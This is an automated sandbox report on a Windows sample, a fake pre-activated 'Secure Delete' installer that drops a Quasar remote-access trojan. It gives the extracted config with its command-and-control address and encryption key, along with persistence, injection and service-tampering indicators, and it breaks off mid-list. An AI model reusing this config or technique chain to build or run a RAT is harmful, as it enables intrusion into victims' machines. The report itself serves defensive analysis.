Analysis
-
max time kernel
25s -
max time network
119s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
03-01-2025 21:02
Static task
static1
Behavioral task
behavioral1
Sample
c28e37ce98cb20850ba164913c668995822e38c35c491d5ca0e5ec206148b578N.exe
Resource
win7-20241023-en
General
-
Target
c28e37ce98cb20850ba164913c668995822e38c35c491d5ca0e5ec206148b578N.exe
-
Size
3.2MB
-
MD5
77d75d34a217ca48d26b72d6bf8dedb0
-
SHA1
9a623c8553fec5ccceb7b0de3d1b828da3a49ac2
-
SHA256
c28e37ce98cb20850ba164913c668995822e38c35c491d5ca0e5ec206148b578
-
SHA512
0334623cf7192350bfb8f15a02b273d9cc8e9504f8a04aab0db29e4bfa25e1cc36f35fa2017da73a331caad6aaa893b4b99c9e891071f3b43959f4ad000f53bc
-
SSDEEP
98304:j3Gv5mmQ4yVPgp5qG8AbuF+taoPKN494tP+DLA1s2x:j3Gv5mmQ4yVPgp5qG8AbuF+ta+KN4yt9
Malware Config
Extracted
quasar
1.4.0
4Drun
185.148.3.216:4000
c3557859-56ac-475e-b44d-e1b60c20d0d0
-
encryption_key
B000736BEBDF08FC1B6696200651882CF57E43E7
-
install_name
Client.exe
-
log_directory
Logs
-
reconnect_delay
3000
-
startup_key
3dfx Startup
-
subdirectory
SubDir
Signatures
-
Quasar family
-
Quasar payload 3 IoCs
resource yara_rule behavioral2/files/0x000b000000023b65-26.dat family_quasar behavioral2/files/0x000a000000023b6e-52.dat family_quasar behavioral2/memory/3692-60-0x00000000006A0000-0x0000000000724000-memory.dmp family_quasar -
Blocklisted process makes network request 1 IoCs
flow pid Process 5 4212 powershell.exe -
pid Process 2804 powershell.exe 4212 powershell.exe 968 powershell.exe 3348 powershell.exe 1716 powershell.exe 4212 powershell.exe 4748 powershell.exe 4212 powershell.exe -
Creates new service(s) 2 TTPs
-
Downloads MZ/PE file
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation c28e37ce98cb20850ba164913c668995822e38c35c491d5ca0e5ec206148b578N.exe Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation 5fr5gthkjdg71.exe -
Executes dropped EXE 6 IoCs
pid Process 2240 5fr5gthkjdg71.exe 1668 gfiKDLgr58thy4d.exe 4588 GR55Qg1hth.exe 3692 F4R5fd8grr.exe 908 Client.exe 3476 kaptsegthwf.exe -
Enumerates connected drives 3 TTPs 46 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\N: msiexec.exe -
Power Settings 1 TTPs 13 IoCs
powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.
pid Process 4276 powercfg.exe 1952 powercfg.exe 2380 powercfg.exe 1912 powercfg.exe 5968 powercfg.exe 1984 cmd.exe 2692 powercfg.exe 2436 powercfg.exe 456 powercfg.exe 4484 powercfg.exe 5964 powercfg.exe 388 powercfg.exe 4932 powercfg.exe -
Drops file in System32 directory 1 IoCs
description ioc Process File opened for modification C:\Windows\system32\MRT.exe gfiKDLgr58thy4d.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 1668 set thread context of 4012 1668 gfiKDLgr58thy4d.exe 143 -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files (x86)\Secure Delete\version-information.ini msiexec.exe File created C:\Program Files (x86)\Secure Delete\Framework\Languages\en.ini msiexec.exe File created C:\Program Files (x86)\Secure Delete\Framework\Languages-flags\nl.png msiexec.exe File opened for modification C:\Program Files (x86)\Secure Delete\Application\Languages\de.ini msiexec.exe File created C:\Program Files (x86)\Secure Delete\Application\pro.png msiexec.exe File created C:\Program Files (x86)\Secure Delete\Framework\UForms\update.png msiexec.exe File opened for modification C:\Program Files (x86)\Secure Delete\Application\Languages\es.ini msiexec.exe File created C:\Program Files (x86)\Secure Delete\Framework\Interface\ui_minButton_hover.png msiexec.exe File opened for modification C:\Program Files (x86)\Secure Delete\Framework\Languages\ar.ini msiexec.exe File created C:\Program Files (x86)\Secure Delete\Framework\Languages-flags\ru.png msiexec.exe File opened for modification C:\Program Files (x86)\Secure Delete\Application\Languages\zh.ini msiexec.exe File created C:\Program Files (x86)\Secure Delete\Application\Languages\it.ini msiexec.exe File created C:\Program Files (x86)\Secure Delete\Framework\FunProMessages\ko.txt msiexec.exe File created C:\Program Files (x86)\Secure Delete\Framework\Languages\fr.ini msiexec.exe File opened for modification C:\Program Files (x86)\Secure Delete\Application\Languages\pl.ini msiexec.exe File created C:\Program Files (x86)\Secure Delete\Application\Languages\en.ini msiexec.exe File created C:\Program Files (x86)\Secure Delete\Framework\UForms\pro-223-440.png msiexec.exe File created C:\Program Files (x86)\Secure Delete\Framework\UForms\pro-250-241.png msiexec.exe File created C:\Program Files (x86)\Secure Delete\Framework\Languages-flags\zh.png msiexec.exe File opened for modification C:\Program Files (x86)\Secure Delete\Application\Languages\hu.ini msiexec.exe File created C:\Program Files (x86)\Secure Delete\Application\Languages\hu.ini msiexec.exe File created C:\Program Files (x86)\Secure Delete\Framework\FunProMessages\en.txt msiexec.exe File created C:\Program Files (x86)\Secure Delete\Framework\Languages\ru.ini msiexec.exe File opened for modification C:\Program Files (x86)\Secure Delete\Framework\Interface\colors.ini msiexec.exe File created C:\Program Files (x86)\Secure Delete\Framework\FunProMessages\pt.txt msiexec.exe File created C:\Program Files (x86)\Secure Delete\Framework\Languages-flags\es.png msiexec.exe File created C:\Program Files (x86)\Secure Delete\unins000.exe msiexec.exe File created C:\Program Files (x86)\Secure Delete\Application\Languages\zh.ini msiexec.exe File created C:\Program Files (x86)\Secure Delete\Framework\Languages-flags\it.png msiexec.exe File created C:\Program Files (x86)\Secure Delete\Application\Languages\es.ini msiexec.exe File created C:\Program Files (x86)\Secure Delete\Application\Languages\fr.ini msiexec.exe File created C:\Program Files (x86)\Secure Delete\Framework\Languages-flags\de.png msiexec.exe File created C:\Program Files (x86)\Secure Delete\Framework\Interface\colors.ini msiexec.exe File created C:\Program Files (x86)\Secure Delete\Framework\Languages-flags\hu.png msiexec.exe File created C:\Program Files (x86)\Secure Delete\Application\Languages\pl.ini msiexec.exe File created C:\Program Files (x86)\Secure Delete\Framework\FunProMessages\cs.txt msiexec.exe File opened for modification C:\Program Files (x86)\Secure Delete\Framework\Languages\en.ini msiexec.exe File opened for modification C:\Program Files (x86)\Secure Delete\Framework\Languages\cs.ini msiexec.exe File opened for modification C:\Program Files (x86)\Secure Delete\Framework\Languages\el.ini msiexec.exe File created C:\Program Files (x86)\Secure Delete\version-information.ini msiexec.exe File created C:\Program Files (x86)\Secure Delete\Framework\Languages-flags\fr.png msiexec.exe File created C:\Program Files (x86)\Secure Delete\Framework\Languages-flags\ko.png msiexec.exe File created C:\Program Files (x86)\Secure Delete\SecureDelete.exe.config msiexec.exe File created C:\Program Files (x86)\Secure Delete\Framework\Languages\cs.ini msiexec.exe File created C:\Program Files (x86)\Secure Delete\Framework\Languages\hu.ini msiexec.exe File opened for modification C:\Program Files (x86)\Secure Delete\Framework\Languages\de.ini msiexec.exe File created C:\Program Files (x86)\Secure Delete\Framework\FunProMessages\ar.txt msiexec.exe File created C:\Program Files (x86)\Secure Delete\Framework\Interface\ui_closeButton_flat.png msiexec.exe File opened for modification C:\Program Files (x86)\Secure Delete\Framework\Languages\hu.ini msiexec.exe File opened for modification C:\Program Files (x86)\Secure Delete\Framework\Languages\es.ini msiexec.exe File created C:\Program Files (x86)\Secure Delete\Framework\Languages\pl.ini msiexec.exe File created C:\Program Files (x86)\Secure Delete\Framework\UForms\subscribe1.png msiexec.exe File opened for modification C:\Program Files (x86)\Secure Delete\Framework\Languages\it.ini msiexec.exe File created C:\Program Files (x86)\Secure Delete\Framework\FunProMessages\zh.txt msiexec.exe File created C:\Program Files (x86)\Secure Delete\Framework\Languages\pt.ini msiexec.exe File opened for modification C:\Program Files (x86)\Secure Delete\Application\Languages\pt.ini msiexec.exe File created C:\Program Files (x86)\Secure Delete\Application\Languages\pt.ini msiexec.exe File created C:\Program Files (x86)\Secure Delete\Framework\FunProMessages\ru.txt msiexec.exe File created C:\Program Files (x86)\Secure Delete\Framework\UForms\subscribe2.png msiexec.exe File opened for modification C:\Program Files (x86)\Secure Delete\Application\Languages\cs.ini msiexec.exe File created C:\Program Files (x86)\Secure Delete\Framework\Languages\ar.ini msiexec.exe File created C:\Program Files (x86)\Secure Delete\Framework\Languages\it.ini msiexec.exe File created C:\Program Files (x86)\Secure Delete\Framework\Languages-flags\cs.png msiexec.exe File created C:\Program Files (x86)\Secure Delete\unins000.msg msiexec.exe -
Drops file in Windows directory 16 IoCs
description ioc Process File opened for modification C:\Windows\Installer\e58077d.msi msiexec.exe File opened for modification C:\Windows\Installer\ msiexec.exe File created C:\Windows\Installer\{E65B48A9-CA11-4DE4-9E44-25AA56CA24CB}\SecureDelete.exe msiexec.exe File opened for modification C:\Windows\Installer\{E65B48A9-CA11-4DE4-9E44-25AA56CA24CB}\SecureDelete.exe msiexec.exe File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log msiexec.exe File opened for modification C:\Windows\Installer\MSI848.tmp msiexec.exe File created C:\Windows\Installer\{E65B48A9-CA11-4DE4-9E44-25AA56CA24CB}\ARPPRODUCTICON.ico msiexec.exe File opened for modification C:\Windows\Installer\{E65B48A9-CA11-4DE4-9E44-25AA56CA24CB}\ARPPRODUCTICON.ico msiexec.exe File opened for modification C:\Windows\Installer\{E65B48A9-CA11-4DE4-9E44-25AA56CA24CB}\SecureDelete1.exe msiexec.exe File created C:\Windows\Installer\e58077d.msi msiexec.exe File created C:\Windows\Installer\inprogressinstallinfo.ipi msiexec.exe File created C:\Windows\Installer\SourceHash{E65B48A9-CA11-4DE4-9E44-25AA56CA24CB} msiexec.exe File created C:\Windows\Installer\e58077f.msi msiexec.exe File created C:\Windows\Installer\{E65B48A9-CA11-4DE4-9E44-25AA56CA24CB}\SecureDelete1.exe msiexec.exe File created C:\Windows\Installer\{E65B48A9-CA11-4DE4-9E44-25AA56CA24CB}\SecureDelete2.exe msiexec.exe File opened for modification C:\Windows\Installer\{E65B48A9-CA11-4DE4-9E44-25AA56CA24CB}\SecureDelete2.exe msiexec.exe -
Launches sc.exe 19 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 3172 sc.exe 4176 sc.exe 2744 sc.exe 3428 sc.exe 3540 sc.exe 3544 sc.exe 4748 sc.exe 3920 sc.exe 3856 sc.exe 4916 sc.exe 4484 sc.exe 3364 sc.exe 3348 sc.exe 5588 sc.exe 2396 sc.exe 1536 sc.exe 4300 sc.exe 5884 sc.exe 520 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks SCSI registry key(s) 3 TTPs 5 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters vssvc.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr vssvc.exe Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\PartitionTableCache = 00000000040000001397c7f967de25740000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000c01200000000ffffffff0000000027010100000800001397c7f90000000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000d01200000000000020ed3a000000ffffffff0000000007000100006809001397c7f9000000000000d012000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000f0ff3a0000000000000005000000ffffffff000000000700010000f87f1d1397c7f9000000000000f0ff3a00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff0000000000000000000000001397c7f900000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 vssvc.exe Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\SnapshotDataCache = 534e41505041525401000000700000008ec7416a0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 vssvc.exe -
Modifies data under HKEY_USERS 23 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\27 msiexec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\26\52C64B7E msiexec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26 msiexec.exe -
Modifies registry class 24 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\9A84B56E11AC4ED4E94452AA65AC42BC\ProductIcon = "C:\\Windows\\Installer\\{E65B48A9-CA11-4DE4-9E44-25AA56CA24CB}\\ARPPRODUCTICON.ico" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\9A84B56E11AC4ED4E94452AA65AC42BC\SourceList\LastUsedSource = "n;1;C:\\Users\\Public\\" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\9A84B56E11AC4ED4E94452AA65AC42BC\AuthorizedLUAApp = "0" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\9A84B56E11AC4ED4E94452AA65AC42BC\SourceList msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\9A84B56E11AC4ED4E94452AA65AC42BC\SourceList\Net\1 = "C:\\Users\\Public\\" msiexec.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\9A84B56E11AC4ED4E94452AA65AC42BC\Clients = 3a0000000000 msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\9A84B56E11AC4ED4E94452AA65AC42BC\Complete msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\9A84B56E11AC4ED4E94452AA65AC42BC\ProductName = "Secure Delete 2316.00 Préactivé" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\9A84B56E11AC4ED4E94452AA65AC42BC\PackageCode = "F0774D97359D7E04CB472604A052589A" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\9A84B56E11AC4ED4E94452AA65AC42BC\Language = "0" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\9A84B56E11AC4ED4E94452AA65AC42BC\Version = "201326592" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\9A84B56E11AC4ED4E94452AA65AC42BC\Assignment = "1" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\9A84B56E11AC4ED4E94452AA65AC42BC\InstanceType = "0" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\9A84B56E11AC4ED4E94452AA65AC42BC\SourceList\Media msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\9A84B56E11AC4ED4E94452AA65AC42BC\DeploymentFlags = "3" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\A0B35D785907D0540800C40B63A69252 msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\A0B35D785907D0540800C40B63A69252\9A84B56E11AC4ED4E94452AA65AC42BC msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\9A84B56E11AC4ED4E94452AA65AC42BC\SourceList\PackageName = "setup.msi" msiexec.exe Key created \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000_Classes\Local Settings c28e37ce98cb20850ba164913c668995822e38c35c491d5ca0e5ec206148b578N.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\9A84B56E11AC4ED4E94452AA65AC42BC msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\9A84B56E11AC4ED4E94452AA65AC42BC msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\9A84B56E11AC4ED4E94452AA65AC42BC\AdvertiseFlags = "388" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\9A84B56E11AC4ED4E94452AA65AC42BC\SourceList\Net msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\9A84B56E11AC4ED4E94452AA65AC42BC\SourceList\Media\1 = ";" msiexec.exe -
Runs net.exe
-
Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 864 schtasks.exe 1760 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 36 IoCs
pid Process 4212 powershell.exe 4212 powershell.exe 1668 gfiKDLgr58thy4d.exe 4748 powershell.exe 4748 powershell.exe 4748 powershell.exe 968 powershell.exe 968 powershell.exe 968 powershell.exe 1668 gfiKDLgr58thy4d.exe 1668 gfiKDLgr58thy4d.exe 1668 gfiKDLgr58thy4d.exe 1668 gfiKDLgr58thy4d.exe 1668 gfiKDLgr58thy4d.exe 1668 gfiKDLgr58thy4d.exe 2804 powershell.exe 2804 powershell.exe 1668 gfiKDLgr58thy4d.exe 2804 powershell.exe 1668 gfiKDLgr58thy4d.exe 1668 gfiKDLgr58thy4d.exe 1668 gfiKDLgr58thy4d.exe 1668 gfiKDLgr58thy4d.exe 1668 gfiKDLgr58thy4d.exe 4012 dialer.exe 4012 dialer.exe 1668 gfiKDLgr58thy4d.exe 4012 dialer.exe 4012 dialer.exe 1668 gfiKDLgr58thy4d.exe 1668 gfiKDLgr58thy4d.exe 3476 kaptsegthwf.exe 4012 dialer.exe 4012 dialer.exe 3348 powershell.exe 3348 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeShutdownPrivilege 1520 msiexec.exe Token: SeIncreaseQuotaPrivilege 1520 msiexec.exe Token: SeSecurityPrivilege 468 msiexec.exe Token: SeCreateTokenPrivilege 1520 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 1520 msiexec.exe Token: SeLockMemoryPrivilege 1520 msiexec.exe Token: SeIncreaseQuotaPrivilege 1520 msiexec.exe Token: SeMachineAccountPrivilege 1520 msiexec.exe Token: SeTcbPrivilege 1520 msiexec.exe Token: SeSecurityPrivilege 1520 msiexec.exe Token: SeTakeOwnershipPrivilege 1520 msiexec.exe Token: SeLoadDriverPrivilege 1520 msiexec.exe Token: SeSystemProfilePrivilege 1520 msiexec.exe Token: SeSystemtimePrivilege 1520 msiexec.exe Token: SeProfSingleProcessPrivilege 1520 msiexec.exe Token: SeIncBasePriorityPrivilege 1520 msiexec.exe Token: SeCreatePagefilePrivilege 1520 msiexec.exe Token: SeCreatePermanentPrivilege 1520 msiexec.exe Token: SeBackupPrivilege 1520 msiexec.exe Token: SeRestorePrivilege 1520 msiexec.exe Token: SeShutdownPrivilege 1520 msiexec.exe Token: SeDebugPrivilege 1520 msiexec.exe Token: SeAuditPrivilege 1520 msiexec.exe Token: SeSystemEnvironmentPrivilege 1520 msiexec.exe Token: SeChangeNotifyPrivilege 1520 msiexec.exe Token: SeRemoteShutdownPrivilege 1520 msiexec.exe Token: SeUndockPrivilege 1520 msiexec.exe Token: SeSyncAgentPrivilege 1520 msiexec.exe Token: SeEnableDelegationPrivilege 1520 msiexec.exe Token: SeManageVolumePrivilege 1520 msiexec.exe Token: SeImpersonatePrivilege 1520 msiexec.exe Token: SeCreateGlobalPrivilege 1520 msiexec.exe Token: SeDebugPrivilege 4212 powershell.exe Token: SeBackupPrivilege 1480 vssvc.exe Token: SeRestorePrivilege 1480 vssvc.exe Token: SeAuditPrivilege 1480 vssvc.exe Token: SeBackupPrivilege 468 msiexec.exe Token: SeRestorePrivilege 468 msiexec.exe Token: SeDebugPrivilege 3692 F4R5fd8grr.exe Token: SeDebugPrivilege 908 Client.exe Token: SeRestorePrivilege 468 msiexec.exe Token: SeTakeOwnershipPrivilege 468 msiexec.exe Token: SeRestorePrivilege 468 msiexec.exe Token: SeTakeOwnershipPrivilege 468 msiexec.exe Token: SeBackupPrivilege 1072 srtasks.exe Token: SeRestorePrivilege 1072 srtasks.exe Token: SeSecurityPrivilege 1072 srtasks.exe Token: SeTakeOwnershipPrivilege 1072 srtasks.exe Token: SeBackupPrivilege 1072 srtasks.exe Token: SeRestorePrivilege 1072 srtasks.exe Token: SeSecurityPrivilege 1072 srtasks.exe Token: SeTakeOwnershipPrivilege 1072 srtasks.exe Token: SeRestorePrivilege 468 msiexec.exe Token: SeTakeOwnershipPrivilege 468 msiexec.exe Token: SeRestorePrivilege 468 msiexec.exe Token: SeTakeOwnershipPrivilege 468 msiexec.exe Token: SeRestorePrivilege 468 msiexec.exe Token: SeTakeOwnershipPrivilege 468 msiexec.exe Token: SeRestorePrivilege 468 msiexec.exe Token: SeTakeOwnershipPrivilege 468 msiexec.exe Token: SeRestorePrivilege 468 msiexec.exe Token: SeTakeOwnershipPrivilege 468 msiexec.exe Token: SeRestorePrivilege 468 msiexec.exe Token: SeTakeOwnershipPrivilege 468 msiexec.exe -
Suspicious use of FindShellTrayWindow 2 IoCs
pid Process 1520 msiexec.exe 1520 msiexec.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 4588 GR55Qg1hth.exe 908 Client.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4240 wrote to memory of 4912 4240 c28e37ce98cb20850ba164913c668995822e38c35c491d5ca0e5ec206148b578N.exe 82 PID 4240 wrote to memory of 4912 4240 c28e37ce98cb20850ba164913c668995822e38c35c491d5ca0e5ec206148b578N.exe 82 PID 4240 wrote to memory of 1520 4240 c28e37ce98cb20850ba164913c668995822e38c35c491d5ca0e5ec206148b578N.exe 85 PID 4240 wrote to memory of 1520 4240 c28e37ce98cb20850ba164913c668995822e38c35c491d5ca0e5ec206148b578N.exe 85 PID 4912 wrote to memory of 4924 4912 cmd.exe 86 PID 4912 wrote to memory of 4924 4912 cmd.exe 86 PID 4924 wrote to memory of 1056 4924 net.exe 87 PID 4924 wrote to memory of 1056 4924 net.exe 87 PID 4912 wrote to memory of 4212 4912 cmd.exe 88 PID 4912 wrote to memory of 4212 4912 cmd.exe 88 PID 4212 wrote to memory of 2240 4212 powershell.exe 92 PID 4212 wrote to memory of 2240 4212 powershell.exe 92 PID 2240 wrote to memory of 1668 2240 5fr5gthkjdg71.exe 95 PID 2240 wrote to memory of 1668 2240 5fr5gthkjdg71.exe 95 PID 2240 wrote to memory of 4588 2240 5fr5gthkjdg71.exe 96 PID 2240 wrote to memory of 4588 2240 5fr5gthkjdg71.exe 96 PID 2240 wrote to memory of 3692 2240 5fr5gthkjdg71.exe 97 PID 2240 wrote to memory of 3692 2240 5fr5gthkjdg71.exe 97 PID 3692 wrote to memory of 864 3692 F4R5fd8grr.exe 98 PID 3692 wrote to memory of 864 3692 F4R5fd8grr.exe 98 PID 3692 wrote to memory of 908 3692 F4R5fd8grr.exe 101 PID 3692 wrote to memory of 908 3692 F4R5fd8grr.exe 101 PID 908 wrote to memory of 1760 908 Client.exe 103 PID 908 wrote to memory of 1760 908 Client.exe 103 PID 468 wrote to memory of 1072 468 msiexec.exe 107 PID 468 wrote to memory of 1072 468 msiexec.exe 107 PID 4588 wrote to memory of 968 4588 GR55Qg1hth.exe 114 PID 4588 wrote to memory of 968 4588 GR55Qg1hth.exe 114 PID 3612 wrote to memory of 3172 3612 cmd.exe 160 PID 3612 wrote to memory of 3172 3612 cmd.exe 160 PID 4588 wrote to memory of 3500 4588 GR55Qg1hth.exe 199 PID 4588 wrote to memory of 3500 4588 GR55Qg1hth.exe 199 PID 4588 wrote to memory of 1984 4588 GR55Qg1hth.exe 128 PID 4588 wrote to memory of 1984 4588 GR55Qg1hth.exe 128 PID 4588 wrote to memory of 2804 4588 GR55Qg1hth.exe 129 PID 4588 wrote to memory of 2804 4588 GR55Qg1hth.exe 129 PID 3500 wrote to memory of 3348 3500 cmd.exe 162 PID 3500 wrote to memory of 3348 3500 cmd.exe 162 PID 1984 wrote to memory of 4932 1984 cmd.exe 136 PID 1984 wrote to memory of 4932 1984 cmd.exe 136 PID 3500 wrote to memory of 3544 3500 cmd.exe 137 PID 3500 wrote to memory of 3544 3500 cmd.exe 137 PID 1984 wrote to memory of 456 1984 cmd.exe 142 PID 1984 wrote to memory of 456 1984 cmd.exe 142 PID 1668 wrote to memory of 4012 1668 gfiKDLgr58thy4d.exe 143 PID 1668 wrote to memory of 4012 1668 gfiKDLgr58thy4d.exe 143 PID 